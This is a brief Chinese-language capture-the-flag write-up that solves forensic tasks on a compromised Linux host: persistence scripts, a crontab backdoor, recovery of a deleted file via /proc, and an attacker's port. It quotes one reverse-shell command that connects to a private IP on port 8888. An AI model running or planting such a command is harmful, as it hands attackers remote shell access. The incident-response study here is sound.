2024深育杯 攻防大赛 WP

Reverse

【任务四】miner：

题目简介：管理员在自己排查时，发现样本释放了多个维权脚本，同时攻击者在某两个维权脚本中都添加了一串神秘的代码，这个神秘的代码是什么？请提交flag，flag{两串神秘代码拼接起来}

Hint：

1、/etc/init.d下重点关注下

题目提示 在/etc/init.d目录下 所以我们直接输入命令

直接筛选包含flag的文本 拼接直接得到flag

PWN

【任务二】木马排查：

题目简介：攻击者避免恶意文件被删除，丢失权限，创建了个后门，定期外连，执行外连的指令是？请提交flag，flag{md5(外连指令)}。

根据题目描述 定期外连 判断使用Linux计划任务实现

使用crontab命令查看计划任务：

得到以下内容：

bash -i >& /dev/tcp/192.168.233.133/8888 0>&1

转化为md5 即可得到flag

【任务四】木马排查：

题目简介：管理员发现root目录下的一个文件被删除了，请你帮他恢复该文件，并获取到文件内容flag{文件内容}

通过history命令查看：

攻击者使用nohup tail -f /root/flag.txt > /dev/null & 进行删除文件

通过ps查看进程：

既然 tail 正在监视 /root/flag.txt，我们可以从该进程的内存中读取文件内容。

tail的PID为1

我们可以输入命令查看它的状态信息和内存映射 ls -l /proc/1/fd/

第三项既是flag所在路径 直接cat即可得到

MISC

【任务二】内网攻击：

题目简介：问题2：攻击者远程服务器监听所用的端口是( )？请提交flag，例如端口号为80，则提交Sangfor{80}

下载镜像 直接筛选字符：

直接提交端口号11451 便是flag